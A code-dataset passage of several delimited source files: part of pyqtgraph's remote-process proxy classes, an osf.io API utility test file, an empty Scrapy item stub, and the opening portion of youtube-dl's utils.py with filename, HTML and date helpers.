proxy._setProxyOptions(**opts)
return proxy
class ObjectProxy(object):
"""
Proxy to an object stored by the remote process. Proxies are created
by calling Process._import(), Process.transfer(), or by requesting/calling
attributes on existing proxy objects.
For the most part, this object can be used exactly as if it
were a local object::
rsys = proc._import('sys') # returns proxy to sys module on remote process
rsys.stdout # proxy to remote sys.stdout
rsys.stdout.write # proxy to remote sys.stdout.write
rsys.stdout.write('hello') # calls sys.stdout.write('hello') on remote machine
# and returns the result (None)
When calling a proxy to a remote function, the call can be made synchronous
(result of call is returned immediately), asynchronous (result is returned later),
or return can be disabled entirely::
ros = proc._import('os')
## synchronous call; result is returned immediately
pid = ros.getpid()
## asynchronous call
request = ros.getpid(_callSync='async')
while not request.hasResult():
time.sleep(0.01)
pid = request.result()
## disable return when we know it isn't needed
rsys.stdout.write('hello', _callSync='off')
Additionally, values returned from a remote function call are automatically
returned either by value (must be picklable) or by proxy.
This behavior can be forced::
rnp = proc._import('numpy')
arrProxy = rnp.array([1,2,3,4], _returnType='proxy')
arrValue = rnp.array([1,2,3,4], _returnType='value')
The default callSync and returnType behaviors (as well as others) can be set
for each proxy individually using ObjectProxy._setProxyOptions() or globally using
proc.setProxyOptions().
"""
def __init__(self, processId, proxyId, typeStr='', parent=None):
object.__init__(self)
## can't set attributes directly because setattr is overridden.
self.__dict__['_processId'] = processId
self.__dict__['_typeStr'] = typeStr
self.__dict__['_proxyId'] = proxyId
self.__dict__['_attributes'] = ()
## attributes that affect the behavior of the proxy.
## in all cases, a value of None causes the proxy to ask
## its parent event handler to make the decision
self.__dict__['_proxyOptions'] = {
'callSync': None, ## 'sync', 'async', None
'timeout': None, ## float, None
'returnType': None, ## 'proxy', 'value', 'auto', None
'deferGetattr': None, ## True, False, None
'noProxyTypes': None, ## list of types to send by value instead of by proxy
}
self.__dict__['_handler'] = RemoteEventHandler.getHandler(processId)
self.__dict__['_handler'].registerProxy(self) ## handler will watch proxy; inform remote process when the proxy is deleted.
def _setProxyOptions(self, **kwds):
"""
Change the behavior of this proxy. For all options, a value of None
will cause the proxy to instead use the default behavior defined
by its parent Process.
Options are:
============= =============================================================
callSync 'sync', 'async', 'off', or None.
If 'async', then calling methods will return a Request object
which can be used to inquire later about the result of the
method call.
If 'sync', then calling a method
will block until the remote process has returned its result
or the timeout has elapsed (in this case, a Request object
is returned instead).
If 'off', then the remote process is instructed _not_ to
reply and the method call will return None immediately.
returnType 'auto', 'proxy', 'value', or None.
If 'proxy', then the value returned when calling a method
will be a proxy to the object on the remote process.
If 'value', then attempt to pickle the returned object and
send it back.
If 'auto', then the decision is made by consulting the
'noProxyTypes' option.
autoProxy bool or None. If True, arguments to __call__ are
automatically converted to proxy unless their type is
listed in noProxyTypes (see below). If False, arguments
are left untouched. Use proxy(obj) to manually convert
arguments before sending.
timeout float or None. Length of time to wait during synchronous
requests before returning a Request object instead.
deferGetattr True, False, or None.
If False, all attribute requests will be sent to the remote
process immediately and will block until a response is
received (or timeout has elapsed).
If True, requesting an attribute from the proxy returns a
new proxy immediately. The remote process is _not_ contacted
to make this request. This is faster, but it is possible to
request an attribute that does not exist on the proxied
object. In this case, AttributeError will not be raised
until an attempt is made to look up the attribute on the
remote process.
noProxyTypes List of object types that should _not_ be proxied when
sent to the remote process.
============= =============================================================
"""
self._proxyOptions.update(kwds)
def _getValue(self):
"""
Return the value of the proxied object
(the remote object must be picklable)
"""
return self._handler.getObjValue(self)
def _getProxyOption(self, opt):
val = self._proxyOptions[opt]
if val is None:
return self._handler.getProxyOption(opt)
return val
def _getProxyOptions(self):
return dict([(k, self._getProxyOption(k)) for k in self._proxyOptions])
def __reduce__(self):
return (unpickleObjectProxy, (self._processId, self._proxyId, self._typeStr, self._attributes))
def __repr__(self):
#objRepr = self.__getattr__('__repr__')(callSync='value')
return "<ObjectProxy for process %d, object 0x%x: %s >" % (self._processId, self._proxyId, self._typeStr)
def __getattr__(self, attr, **kwds):
"""
Calls __getattr__ on the remote object and returns the attribute
by value or by proxy depending on the options set (see
ObjectProxy._setProxyOptions and RemoteEventHandler.setProxyOptions)
If the option 'deferGetattr' is True for this proxy, then a new proxy object
is returned _without_ asking the remote object whether the named attribute exists.
This can save time when making multiple chained attribute requests,
but may also defer a possible AttributeError until later, making
them more difficult to debug.
"""
opts = self._getProxyOptions()
for k in opts:
if '_'+k in kwds:
opts[k] = kwds.pop('_'+k)
if opts['deferGetattr'] is True:
return self._deferredAttr(attr)
else:
#opts = self._getProxyOptions()
return self._handler.getObjAttr(self, attr, **opts)
def _deferredAttr(self, attr):
return DeferredObjectProxy(self, attr)
def __call__(self, *args, **kwds):
"""
Attempts to call the proxied object from the remote process.
Accepts extra keyword arguments:
_callSync 'off', 'sync', or 'async'
_returnType 'value', 'proxy', or 'auto'
If the remote call raises an exception on the remote process,
it will be re-raised on the local process.
"""
opts = self._getProxyOptions()
for k in opts:
if '_'+k in kwds:
opts[k] = kwds.pop('_'+k)
return self._handler.callObj(obj=self, args=args, kwds=kwds, **opts)
## Explicitly proxy special methods. Is there a better way to do this??
def _getSpecialAttr(self, attr):
## this just gives us an easy way to change the behavior of the special methods
return self._deferredAttr(attr)
def __getitem__(self, *args):
return self._getSpecialAttr('__getitem__')(*args)
def __setitem__(self, *args):
return self._getSpecialAttr('__setitem__')(*args, _callSync='off')
def __setattr__(self, *args):
return self._getSpecialAttr('__setattr__')(*args, _callSync='off')
def __str__(self, *args):
return self._getSpecialAttr('__str__')(*args, _returnType='value')
def __len__(self, *args):
return self._getSpecialAttr('__len__')(*args)
def __add__(self, *args):
return self._getSpecialAttr('__add__')(*args)
def __sub__(self, *args):
return self._getSpecialAttr('__sub__')(*args)
def __div__(self, *args):
return self._getSpecialAttr('__div__')(*args)
def __truediv__(self, *args):
return self._getSpecialAttr('__truediv__')(*args)
def __floordiv__(self, *args):
return self._getSpecialAttr('__floordiv__')(*args)
def __mul__(self, *args):
return self._getSpecialAttr('__mul__')(*args)
def __pow__(self, *args):
return self._getSpecialAttr('__pow__')(*args)
def __iadd__(self, *args):
return self._getSpecialAttr('__iadd__')(*args, _callSync='off')
def __isub__(self, *args):
return self._getSpecialAttr('__isub__')(*args, _callSync='off')
def __idiv__(self, *args):
return self._getSpecialAttr('__idiv__')(*args, _callSync='off')
def __itruediv__(self, *args):
return self._getSpecialAttr('__itruediv__')(*args, _callSync='off')
def __ifloordiv__(self, *args):
return self._getSpecialAttr('__ifloordiv__')(*args, _callSync='off')
def __imul__(self, *args):
return self._getSpecialAttr('__imul__')(*args, _callSync='off')
def __ipow__(self, *args):
return self._getSpecialAttr('__ipow__')(*args, _callSync='off')
def __rshift__(self, *args):
return self._getSpecialAttr('__rshift__')(*args)
def __lshift__(self, *args):
return self._getSpecialAttr('__lshift__')(*args)
def __irshift__(self, *args):
return self._getSpecialAttr('__irshift__')(*args, _callSync='off')
def __ilshift__(self, *args):
return self._getSpecialAttr('__ilshift__')(*args, _callSync='off')
def __eq__(self, *args):
return self._getSpecialAttr('__eq__')(*args)
def __ne__(self, *args):
return self._getSpecialAttr('__ne__')(*args)
def __lt__(self, *args):
return self._getSpecialAttr('__lt__')(*args)
def __gt__(self, *args):
return self._getSpecialAttr('__gt__')(*args)
def __le__(self, *args):
return self._getSpecialAttr('__le__')(*args)
def __ge__(self, *args):
return self._getSpecialAttr('__ge__')(*args)
def __and__(self, *args):
return self._getSpecialAttr('__and__')(*args)
def __or__(self, *args):
return self._getSpecialAttr('__or__')(*args)
def __xor__(self, *args):
return self._getSpecialAttr('__xor__')(*args)
def __iand__(self, *args):
return self._getSpecialAttr('__iand__')(*args, _callSync='off')
def __ior__(self, *args):
return self._getSpecialAttr('__ior__')(*args, _callSync='off')
def __ixor__(self, *args):
return self._getSpecialAttr('__ixor__')(*args, _callSync='off')
def __mod__(self, *args):
return self._getSpecialAttr('__mod__')(*args)
def __radd__(self, *args):
return self._getSpecialAttr('__radd__')(*args)
def __rsub__(self, *args):
return self._getSpecialAttr('__rsub__')(*args)
def __rdiv__(self, *args):
return self._getSpecialAttr('__rdiv__')(*args)
def __rfloordiv__(self, *args):
return self._getSpecialAttr('__rfloordiv__')(*args)
def __rtruediv__(self, *args):
return self._getSpecialAttr('__rtruediv__')(*args)
def __rmul__(self, *args):
return self._getSpecialAttr('__rmul__')(*args)
def __rpow__(self, *args):
return self._getSpecialAttr('__rpow__')(*args)
def __rrshift__(self, *args):
return self._getSpecialAttr('__rrshift__')(*args)
def __rlshift__(self, *args):
return self._getSpecialAttr('__rlshift__')(*args)
def __rand__(self, *args):
return self._getSpecialAttr('__rand__')(*args)
def __ror__(self, *args):
return self._getSpecialAttr('__ror__')(*args)
def __rxor__(self, *args):
        return self._getSpecialAttr('__rxor__')(*args)
def __rmod__(self, *args):
return self._getSpecialAttr('__rmod__')(*args)
def __hash__(self):
## Required for python3 since __eq__ is defined.
return id(self)
class DeferredObjectProxy(ObjectProxy):
"""
This class represents an attribute (or sub-attribute) of a proxied object.
It is used to speed up attribute requests. Take the following scenario::
rsys = proc._import('sys')
rsys.stdout.write('hello')
For this simple example, a total of 4 synchronous requests are made to
the remote process:
1) import sys
2) getattr(sys, 'stdout')
3) getattr(stdout, 'write')
4) write('hello')
This takes a lot longer than running the equivalent code locally. To
speed things up, we can 'defer' the two attribute lookups so they are
    only carried out when necessary::
rsys = proc._import('sys')
rsys._setProxyOptions(deferGetattr=True)
rsys.stdout.write('hello')
    This example only makes two requests to the remote process; the two
    attribute lookups return DeferredObjectProxy instances immediately,
    without contacting the remote process. When the call
to write() is made, all attribute requests are processed at the same time.
Note that if the attributes requested do not exist on the remote object,
making the call to write() will raise an AttributeError.
"""
def __init__(self, parentProxy, attribute):
## can't set attributes directly because setattr is overridden.
for k in ['_processId', '_typeStr', '_proxyId', '_handler']:
self.__dict__[k] = getattr(parentProxy, k)
self.__dict__['_parent'] = parentProxy ## make sure parent stays alive
self.__dict__['_attributes'] = parentProxy._attributes + (attribute,)
self.__dict__['_proxyOptions'] = parentProxy._proxyOptions.copy()
def __repr__(self):
return ObjectProxy.__repr__(self) + '.' + '.'.join(self._attributes)
def _undefer(self):
"""
Return a non-deferred ObjectProxy referencing the same object
"""
return self._parent.__getattr__(self._attributes[-1], _deferGetattr=False)
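## ---------------------------------------------------------------------------
## Minimal usage sketch (illustrative only). It assumes this module is driven
## through pyqtgraph.multiprocess.Process, which starts the remote interpreter
## and hands back the proxies described in the docstrings above.
if __name__ == '__main__':
    from pyqtgraph.multiprocess import Process
    proc = Process()
    try:
        rnp = proc._import('numpy')              ## ObjectProxy to the remote numpy module
        arr = rnp.ones(4, _returnType='value')   ## force the result back by value (pickled)
        print(arr)
        req = rnp.zeros(4, _callSync='async')    ## asynchronous call; returns a Request
        print(req.result())                      ## block until the remote result arrives
    finally:
        proc.close()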
|
leb2dg/osf.io
|
refs/heads/develop
|
api_tests/base/test_utils.py
|
6
|
# -*- coding: utf-8 -*-
from nose.tools import * # flake8: noqa
import mock # noqa
import unittest
from rest_framework import fields
from rest_framework.exceptions import ValidationError
from api.base import utils as api_utils
from framework.status import push_status_message
class TestTruthyFalsy:
"""Check that our copy/pasted representation of
    TRUTHY and FALSY matches the DRF BooleanField's versions
"""
def test_truthy(self):
assert_equal(api_utils.TRUTHY, fields.BooleanField.TRUE_VALUES)
def test_falsy(self):
assert_equal(api_utils.FALSY, fields.BooleanField.FALSE_VALUES)
class TestIsDeprecated(unittest.TestCase):
def setUp(self):
super(TestIsDeprecated, self).setUp()
self.min_version = '2.0'
self.max_version = '2.5'
def test_is_deprecated(self):
request_version = '2.6'
is_deprecated = api_utils.is_deprecated(
request_version, self.min_version, self.max_version)
assert_equal(is_deprecated, True)
def test_is_not_deprecated(self):
request_version = '2.5'
is_deprecated = api_utils.is_deprecated(
request_version, self.min_version, self.max_version)
assert_equal(is_deprecated, False)
class TestFlaskDjangoIntegration:
def test_push_status_message_no_response(self):
status_message = 'This is a message'
statuses = ['info', 'warning', 'warn', 'success', 'danger', 'default']
for status in statuses:
try:
push_status_message(status_message, kind=status)
except BaseException:
assert_true(
False,
'Exception from push_status_message via API v2 with type "{}".'.format(status)
)
def test_push_status_message_expected_error(self):
status_message = 'This is a message'
try:
push_status_message(status_message, kind='error')
assert_true(
False,
'push_status_message() should have generated a ValidationError exception.'
)
except ValidationError as e:
assert_equal(
e.detail[0],
status_message,
'push_status_message() should have passed along the message with the Exception.'
)
except RuntimeError:
assert_true(
False,
'push_status_message() should have caught the runtime error and replaced it.'
)
except BaseException:
assert_true(
False,
'Exception from push_status_message when called from the v2 API with type "error"'
)
@mock.patch('framework.status.session')
def test_push_status_message_unexpected_error(self, mock_sesh):
status_message = 'This is a message'
exception_message = 'this is some very unexpected problem'
mock_get = mock.Mock(side_effect=RuntimeError(exception_message))
mock_data = mock.Mock()
mock_data.attach_mock(mock_get, 'get')
mock_sesh.attach_mock(mock_data, 'data')
try:
push_status_message(status_message, kind='error')
assert_true(
False,
'push_status_message() should have generated a RuntimeError exception.'
)
except ValidationError as e:
assert_true(
False,
                'push_status_message() should have re-raised the RuntimeError, not raised a ValidationError.'
)
except RuntimeError as e:
assert_equal(getattr(e, 'message', None),
exception_message,
'push_status_message() should have re-raised the '
'original RuntimeError with the original message.')
except BaseException:
assert_true(
False, 'Unexpected Exception from push_status_message when called '
'from the v2 API with type "error"')
|
dcondrey/scrapy-spiders
|
refs/heads/master
|
mandy/mandy/items.py
|
1
|
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
from scrapy.item import Item, Field
class MandyItem(Item):
# define the fields for your item here like:
# name = Field()
pass
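# Illustrative only: a hypothetical item showing the field-definition pattern
# described in the comments above (these field names are made up and are not
# used by the mandy spider).
class ExampleItem(Item):
    title = Field()
    url = Field()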
|
misterhat/youtube-dl
|
refs/heads/master
|
youtube_dl/utils.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import base64
import binascii
import calendar
import codecs
import contextlib
import ctypes
import datetime
import email.utils
import errno
import functools
import gzip
import io
import itertools
import json
import locale
import math
import operator
import os
import pipes
import platform
import re
import socket
import ssl
import subprocess
import sys
import tempfile
import traceback
import xml.etree.ElementTree
import zlib
from .compat import (
compat_HTMLParser,
compat_basestring,
compat_chr,
compat_etree_fromstring,
compat_html_entities,
compat_html_entities_html5,
compat_http_client,
compat_kwargs,
compat_parse_qs,
compat_shlex_quote,
compat_socket_create_connection,
compat_str,
compat_struct_pack,
compat_urllib_error,
compat_urllib_parse,
compat_urllib_parse_urlencode,
compat_urllib_parse_urlparse,
compat_urllib_parse_unquote_plus,
compat_urllib_request,
compat_urlparse,
compat_xpath,
)
from .socks import (
ProxyType,
sockssocket,
)
def register_socks_protocols():
# "Register" SOCKS protocols
# In Python < 2.6.5, urlsplit() suffers from bug https://bugs.python.org/issue7904
# URLs with protocols not in urlparse.uses_netloc are not handled correctly
for scheme in ('socks', 'socks4', 'socks4a', 'socks5'):
if scheme not in compat_urlparse.uses_netloc:
compat_urlparse.uses_netloc.append(scheme)
# This is not clearly defined otherwise
compiled_regex_type = type(re.compile(''))
std_headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20150101 Firefox/47.0 (Chrome)',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-us,en;q=0.5',
}
NO_DEFAULT = object()
ENGLISH_MONTH_NAMES = [
'January', 'February', 'March', 'April', 'May', 'June',
'July', 'August', 'September', 'October', 'November', 'December']
KNOWN_EXTENSIONS = (
'mp4', 'm4a', 'm4p', 'm4b', 'm4r', 'm4v', 'aac',
'flv', 'f4v', 'f4a', 'f4b',
'webm', 'ogg', 'ogv', 'oga', 'ogx', 'spx', 'opus',
'mkv', 'mka', 'mk3d',
'avi', 'divx',
'mov',
'asf', 'wmv', 'wma',
'3gp', '3g2',
'mp3',
'flac',
'ape',
'wav',
'f4f', 'f4m', 'm3u8', 'smil')
# needed for sanitizing filenames in restricted mode
ACCENT_CHARS = dict(zip('ÂÃÄÀÁÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖŐØŒÙÚÛÜŰÝÞßàáâãäåæçèéêëìíîïðñòóôõöőøœùúûüűýþÿ',
itertools.chain('AAAAAA', ['AE'], 'CEEEEIIIIDNOOOOOOO', ['OE'], 'UUUUUYP', ['ss'],
'aaaaaa', ['ae'], 'ceeeeiiiionooooooo', ['oe'], 'uuuuuypy')))
DATE_FORMATS = (
'%d %B %Y',
'%d %b %Y',
'%B %d %Y',
'%b %d %Y',
'%b %dst %Y %I:%M',
'%b %dnd %Y %I:%M',
'%b %dth %Y %I:%M',
'%Y %m %d',
'%Y-%m-%d',
'%Y/%m/%d',
'%Y/%m/%d %H:%M:%S',
'%Y-%m-%d %H:%M:%S',
'%Y-%m-%d %H:%M:%S.%f',
'%d.%m.%Y %H:%M',
'%d.%m.%Y %H.%M',
'%Y-%m-%dT%H:%M:%SZ',
'%Y-%m-%dT%H:%M:%S.%fZ',
'%Y-%m-%dT%H:%M:%S.%f0Z',
'%Y-%m-%dT%H:%M:%S',
'%Y-%m-%dT%H:%M:%S.%f',
'%Y-%m-%dT%H:%M',
)
DATE_FORMATS_DAY_FIRST = list(DATE_FORMATS)
DATE_FORMATS_DAY_FIRST.extend([
'%d-%m-%Y',
'%d.%m.%Y',
'%d.%m.%y',
'%d/%m/%Y',
'%d/%m/%y',
'%d/%m/%Y %H:%M:%S',
])
DATE_FORMATS_MONTH_FIRST = list(DATE_FORMATS)
DATE_FORMATS_MONTH_FIRST.extend([
'%m-%d-%Y',
'%m.%d.%Y',
'%m/%d/%Y',
'%m/%d/%y',
'%m/%d/%Y %H:%M:%S',
])
def preferredencoding():
"""Get preferred encoding.
Returns the best encoding scheme for the system, based on
locale.getpreferredencoding() and some further tweaks.
"""
try:
pref = locale.getpreferredencoding()
'TEST'.encode(pref)
except Exception:
pref = 'UTF-8'
return pref
def write_json_file(obj, fn):
""" Encode obj as JSON and write it to fn, atomically if possible """
fn = encodeFilename(fn)
if sys.version_info < (3, 0) and sys.platform != 'win32':
encoding = get_filesystem_encoding()
# os.path.basename returns a bytes object, but NamedTemporaryFile
# will fail if the filename contains non ascii characters unless we
# use a unicode object
path_basename = lambda f: os.path.basename(fn).decode(encoding)
# the same for os.path.dirname
path_dirname = lambda f: os.path.dirname(fn).decode(encoding)
else:
path_basename = os.path.basename
path_dirname = os.path.dirname
args = {
'suffix': '.tmp',
'prefix': path_basename(fn) + '.',
'dir': path_dirname(fn),
'delete': False,
}
# In Python 2.x, json.dump expects a bytestream.
# In Python 3.x, it writes to a character stream
if sys.version_info < (3, 0):
args['mode'] = 'wb'
else:
args.update({
'mode': 'w',
'encoding': 'utf-8',
})
tf = tempfile.NamedTemporaryFile(**compat_kwargs(args))
try:
with tf:
json.dump(obj, tf)
if sys.platform == 'win32':
# Need to remove existing file on Windows, else os.rename raises
# WindowsError or FileExistsError.
try:
os.unlink(fn)
except OSError:
pass
os.rename(tf.name, fn)
except Exception:
try:
os.remove(tf.name)
except OSError:
pass
raise
if sys.version_info >= (2, 7):
def find_xpath_attr(node, xpath, key, val=None):
""" Find the xpath xpath[@key=val] """
assert re.match(r'^[a-zA-Z_-]+$', key)
expr = xpath + ('[@%s]' % key if val is None else "[@%s='%s']" % (key, val))
return node.find(expr)
else:
def find_xpath_attr(node, xpath, key, val=None):
for f in node.findall(compat_xpath(xpath)):
if key not in f.attrib:
continue
if val is None or f.attrib.get(key) == val:
return f
return None
# On python2.6 the xml.etree.ElementTree.Element methods don't support
# the namespace parameter
def xpath_with_ns(path, ns_map):
components = [c.split(':') for c in path.split('/')]
replaced = []
for c in components:
if len(c) == 1:
replaced.append(c[0])
else:
ns, tag = c
replaced.append('{%s}%s' % (ns_map[ns], tag))
return '/'.join(replaced)
def xpath_element(node, xpath, name=None, fatal=False, default=NO_DEFAULT):
def _find_xpath(xpath):
return node.find(compat_xpath(xpath))
if isinstance(xpath, (str, compat_str)):
n = _find_xpath(xpath)
else:
for xp in xpath:
n = _find_xpath(xp)
if n is not None:
break
if n is None:
if default is not NO_DEFAULT:
return default
elif fatal:
name = xpath if name is None else name
raise ExtractorError('Could not find XML element %s' % name)
else:
return None
return n
def xpath_text(node, xpath, name=None, fatal=False, default=NO_DEFAULT):
n = xpath_element(node, xpath, name, fatal=fatal, default=default)
if n is None or n == default:
return n
if n.text is None:
if default is not NO_DEFAULT:
return default
elif fatal:
name = xpath if name is None else name
raise ExtractorError('Could not find XML element\'s text %s' % name)
else:
return None
return n.text
def xpath_attr(node, xpath, key, name=None, fatal=False, default=NO_DEFAULT):
n = find_xpath_attr(node, xpath, key)
if n is None:
if default is not NO_DEFAULT:
return default
elif fatal:
name = '%s[@%s]' % (xpath, key) if name is None else name
raise ExtractorError('Could not find XML attribute %s' % name)
else:
return None
return n.attrib[key]
def get_element_by_id(id, html):
"""Return the content of the tag with the specified ID in the passed HTML document"""
return get_element_by_attribute('id', id, html)
def get_element_by_class(class_name, html):
return get_element_by_attribute(
'class', r'[^\'"]*\b%s\b[^\'"]*' % re.escape(class_name),
html, escape_value=False)
def get_element_by_attribute(attribute, value, html, escape_value=True):
"""Return the content of the tag with the specified attribute in the passed HTML document"""
value = re.escape(value) if escape_value else value
m = re.search(r'''(?xs)
<([a-zA-Z0-9:._-]+)
(?:\s+[a-zA-Z0-9:._-]+(?:=[a-zA-Z0-9:._-]*|="[^"]*"|='[^']*'))*?
\s+%s=['"]?%s['"]?
(?:\s+[a-zA-Z0-9:._-]+(?:=[a-zA-Z0-9:._-]*|="[^"]*"|='[^']*'))*?
\s*>
(?P<content>.*?)
</\1>
''' % (re.escape(attribute), value), html)
if not m:
return None
res = m.group('content')
if res.startswith('"') or res.startswith("'"):
res = res[1:-1]
return unescapeHTML(res)
class HTMLAttributeParser(compat_HTMLParser):
"""Trivial HTML parser to gather the attributes for a single element"""
def __init__(self):
self.attrs = {}
compat_HTMLParser.__init__(self)
def handle_starttag(self, tag, attrs):
self.attrs = dict(attrs)
def extract_attributes(html_element):
"""Given a string for an HTML element such as
<el
a="foo" B="bar" c="&98;az" d=boz
         empty= noval entity="&amp;"
sq='"' dq="'"
>
Decode and return a dictionary of attributes.
{
        'a': 'foo', 'b': 'bar', 'c': 'baz', 'd': 'boz',
'empty': '', 'noval': None, 'entity': '&',
'sq': '"', 'dq': '\''
}.
NB HTMLParser is stricter in Python 2.6 & 3.2 than in later versions,
but the cases in the unit test will work for all of 2.6, 2.7, 3.2-3.5.
"""
parser = HTMLAttributeParser()
parser.feed(html_element)
parser.close()
return parser.attrs
def clean_html(html):
"""Clean an HTML snippet into a readable string"""
if html is None: # Convenience for sanitizing descriptions etc.
return html
# Newline vs <br />
html = html.replace('\n', ' ')
html = re.sub(r'\s*<\s*br\s*/?\s*>\s*', '\n', html)
html = re.sub(r'<\s*/\s*p\s*>\s*<\s*p[^>]*>', '\n', html)
# Strip html tags
html = re.sub('<.*?>', '', html)
# Replace html entities
html = unescapeHTML(html)
return html.strip()
def sanitize_open(filename, open_mode):
"""Try to open the given filename, and slightly tweak it if this fails.
Attempts to open the given filename. If this fails, it tries to change
the filename slightly, step by step, until it's either able to open it
or it fails and raises a final exception, like the standard open()
function.
It returns the tuple (stream, definitive_file_name).
"""
try:
if filename == '-':
if sys.platform == 'win32':
import msvcrt
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
return (sys.stdout.buffer if hasattr(sys.stdout, 'buffer') else sys.stdout, filename)
stream = open(encodeFilename(filename), open_mode)
return (stream, filename)
except (IOError, OSError) as err:
if err.errno in (errno.EACCES,):
raise
# In case of error, try to remove win32 forbidden chars
alt_filename = sanitize_path(filename)
if alt_filename == filename:
raise
else:
# An exception here should be caught in the caller
stream = open(encodeFilename(alt_filename), open_mode)
return (stream, alt_filename)
def timeconvert(timestr):
"""Convert RFC 2822 defined time string into system timestamp"""
timestamp = None
timetuple = email.utils.parsedate_tz(timestr)
if timetuple is not None:
timestamp = email.utils.mktime_tz(timetuple)
return timestamp
def sanitize_filename(s, restricted=False, is_id=False):
"""Sanitizes a string so it could be used as part of a filename.
If restricted is set, use a stricter subset of allowed characters.
Set is_id if this is not an arbitrary string, but an ID that should be kept if possible
"""
def replace_insane(char):
if restricted and char in ACCENT_CHARS:
return ACCENT_CHARS[char]
if char == '?' or ord(char) < 32 or ord(char) == 127:
return ''
elif char == '"':
return '' if restricted else '\''
elif char == ':':
return '_-' if restricted else ' -'
elif char in '\\/|*<>':
return '_'
if restricted and (char in '!&\'()[]{}$;`^,#' or char.isspace()):
return '_'
if restricted and ord(char) > 127:
return '_'
return char
# Handle timestamps
s = re.sub(r'[0-9]+(?::[0-9]+)+', lambda m: m.group(0).replace(':', '_'), s)
result = ''.join(map(replace_insane, s))
if not is_id:
while '__' in result:
result = result.replace('__', '_')
result = result.strip('_')
# Common case of "Foreign band name - English song title"
if restricted and result.startswith('-_'):
result = result[2:]
if result.startswith('-'):
result = '_' + result[len('-'):]
result = result.lstrip('.')
if not result:
result = '_'
return result
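# Illustrative examples (not from the test suite):
#   sanitize_filename('A: B/C?')                  -> 'A - B_C'
#   sanitize_filename('A: B/C?', restricted=True) -> 'A_-_B_C'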
def sanitize_path(s):
"""Sanitizes and normalizes path on Windows"""
if sys.platform != 'win32':
return s
drive_or_unc, _ = os.path.splitdrive(s)
if sys.version_info < (2, 7) and not drive_or_unc:
drive_or_unc, _ = os.path.splitunc(s)
norm_path = os.path.normpath(remove_start(s, drive_or_unc)).split(os.path.sep)
if drive_or_unc:
norm_path.pop(0)
sanitized_path = [
path_part if path_part in ['.', '..'] else re.sub('(?:[/<>:"\\|\\\\?\\*]|[\s.]$)', '#', path_part)
for path_part in norm_path]
if drive_or_unc:
sanitized_path.insert(0, drive_or_unc + os.path.sep)
return os.path.join(*sanitized_path)
# Prepend protocol-less URLs with `http:` scheme in order to mitigate the number of
# unwanted failures due to missing protocol
def sanitize_url(url):
return 'http:%s' % url if url.startswith('//') else url
def sanitized_Request(url, *args, **kwargs):
return compat_urllib_request.Request(sanitize_url(url), *args, **kwargs)
def orderedSet(iterable):
""" Remove all duplicates from the input iterable """
res = []
for el in iterable:
if el not in res:
res.append(el)
return res
def _htmlentity_transform(entity_with_semicolon):
"""Transforms an HTML entity to a character."""
entity = entity_with_semicolon[:-1]
# Known non-numeric HTML entity
if entity in compat_html_entities.name2codepoint:
return compat_chr(compat_html_entities.name2codepoint[entity])
# TODO: HTML5 allows entities without a semicolon. For example,
    # '&Eacuteric' should be decoded as 'Éric'.
if entity_with_semicolon in compat_html_entities_html5:
return compat_html_entities_html5[entity_with_semicolon]
mobj = re.match(r'#(x[0-9a-fA-F]+|[0-9]+)', entity)
if mobj is not None:
numstr = mobj.group(1)
if numstr.startswith('x'):
base = 16
numstr = '0%s' % numstr
else:
base = 10
# See https://github.com/rg3/youtube-dl/issues/7518
try:
return compat_chr(int(numstr, base))
except ValueError:
pass
# Unknown entity in name, return its literal representation
return '&%s;' % entity
def unescapeHTML(s):
if s is None:
return None
assert type(s) == compat_str
return re.sub(
r'&([^;]+;)', lambda m: _htmlentity_transform(m.group(1)), s)
def get_subprocess_encoding():
if sys.platform == 'win32' and sys.getwindowsversion()[0] >= 5:
# For subprocess calls, encode with locale encoding
# Refer to http://stackoverflow.com/a/9951851/35070
encoding = preferredencoding()
else:
encoding = sys.getfilesystemencoding()
if encoding is None:
encoding = 'utf-8'
return encoding
def encodeFilename(s, for_subprocess=False):
"""
@param s The name of the file
"""
assert type(s) == compat_str
# Python 3 has a Unicode API
if sys.version_info >= (3, 0):
return s
# Pass '' directly to use Unicode APIs on Windows 2000 and up
# (Detecting Windows NT 4 is tricky because 'major >= 4' would
# match Windows 9x series as well. Besides, NT 4 is obsolete.)
if not for_subprocess and sys.platform == 'win32' and sys.getwindowsversion()[0] >= 5:
return s
# Jython assumes filenames are Unicode strings though reported as Python 2.x compatible
if sys.platform.startswith('java'):
return s
return s.encode(get_subprocess_encoding(), 'ignore')
def decodeFilename(b, for_subprocess=False):
if sys.version_info >= (3, 0):
return b
if not isinstance(b, bytes):
return b
return b.decode(get_subprocess_encoding(), 'ignore')
def encodeArgument(s):
if not isinstance(s, compat_str):
# Legacy code that uses byte strings
# Uncomment the following line after fixing all post processors
# assert False, 'Internal error: %r should be of type %r, is %r' % (s, compat_str, type(s))
s = s.decode('ascii')
return encodeFilename(s, True)
def decodeArgument(b):
return decodeFilename(b, True)
def decodeOption(optval):
if optval is None:
return optval
if isinstance(optval, bytes):
optval = optval.decode(preferredencoding())
assert isinstance(optval, compat_str)
return optval
def formatSeconds(secs):
if secs > 3600:
return '%d:%02d:%02d' % (secs // 3600, (secs % 3600) // 60, secs % 60)
elif secs > 60:
return '%d:%02d' % (secs // 60, secs % 60)
else:
return '%d' % secs
def make_HTTPS_handler(params, **kwargs):
opts_no_check_certificate = params.get('nocheckcertificate', False)
if hasattr(ssl, 'create_default_context'): # Python >= 3.4 or 2.7.9
context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
if opts_no_check_certificate:
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
try:
return YoutubeDLHTTPSHandler(params, context=context, **kwargs)
except TypeError:
# Python 2.7.8
# (create_default_context present but HTTPSHandler has no context=)
pass
if sys.version_info < (3, 2):
return YoutubeDLHTTPSHandler(params, **kwargs)
else: # Python < 3.4
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = (ssl.CERT_NONE
if opts_no_check_certificate
else ssl.CERT_REQUIRED)
